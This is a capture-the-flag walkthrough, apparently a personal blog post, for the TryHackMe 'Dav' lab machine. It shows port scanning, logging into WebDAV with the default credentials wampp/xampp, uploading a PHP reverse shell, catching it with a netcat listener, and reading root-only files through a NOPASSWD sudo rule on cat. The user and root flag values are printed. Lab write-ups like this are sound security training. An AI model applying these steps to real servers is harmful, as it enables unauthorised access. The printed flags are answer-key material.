It’s Shahabor Hossain Rifat here.Today I’m going to show you how can you break into Dav tryhackme machine. So let’s get started.
First I simply scanned for all the ports using Nmap.
Port 80 is open so let’s access the website. There is an apache default page.
Let’s run gobuster against the website and see what we can find out.
I found a WebDAV accessible directory.
We need a username and password to access this directory, I did some Google searches and I found a blog article
I found that we can use ‘cadaver’ to access WebDAV . Let’s try to login by default credentials.
user: wampp pass: xampp
We can now upload a PHP shell. I got a php reverse shell from pentestmonkey github
Don’t forget to modify your IP and PORT in the PHP shell.
Do not forget to open an Netcat listener.
dav:/webdav/> PUT shell.php Uploading shell.php to `/webdav/shell.php': Progress: [=============================>] 100.0% of 193425 bytes succeeded. dav:/webdav/> ls Listing collection `/webdav/': succeeded. passwd.dav 44 August 26 2019 shell.php 193425 October 12 12:10
❯ nc -nvlp 9999 Connection from 10.10.155.247:49024 Linux ubuntu 4.4.0-159-generic #187-Ubuntu SMP Thu Aug 1 16:28:06 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 23:17:49 up 18 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data
$ cat /home/merlin/user.txt 449b40fe93f78a938523b7e4dcd66d2a
After a bit of enumeration. I run sudo -l command. We see that we can leverage cat to read the root flag because we can run it as root.
$ sudo -l Matching Defaults entries for www-data on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on ubuntu: (ALL) NOPASSWD: /bin/cat
It’s too easy
$ sudo cat /root/root.txt 101101ddc16b0cdf65ba0b8a7af7afa5
Hope you guys enjoyed this tryhackme Walkthrough.